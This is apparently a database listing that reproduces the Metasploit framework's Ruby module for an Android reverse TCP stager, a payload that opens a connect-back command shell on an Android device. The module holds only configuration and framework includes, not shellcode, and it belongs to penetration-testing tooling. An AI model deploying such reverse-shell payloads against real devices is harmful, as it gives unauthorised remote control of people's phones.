Lucene search

K
metasploitMihi, egypt <[email protected]>MSF:PAYLOAD-ANDROID-SHELL-REVERSE_TCP-
HistoryApr 12, 2013 - 5:57 p.m.

Command Shell, Android Reverse TCP Stager

2013-04-1217:57:04
mihi, egypt <[email protected]>
www.rapid7.com
22

Spawn a piped command shell (sh). Connect back stager

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Stager
  include Msf::Payload::Android
  include Msf::Payload::Android::ReverseTcp

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Android Reverse TCP Stager',
      'Description'   => 'Connect back stager',
      'Author'        => ['mihi', 'egypt'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'android',
      'Arch'          => ARCH_DALVIK,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Convention'    => 'javasocket',
      'Stager'        => {'Payload' => ''}
      ))
  end
end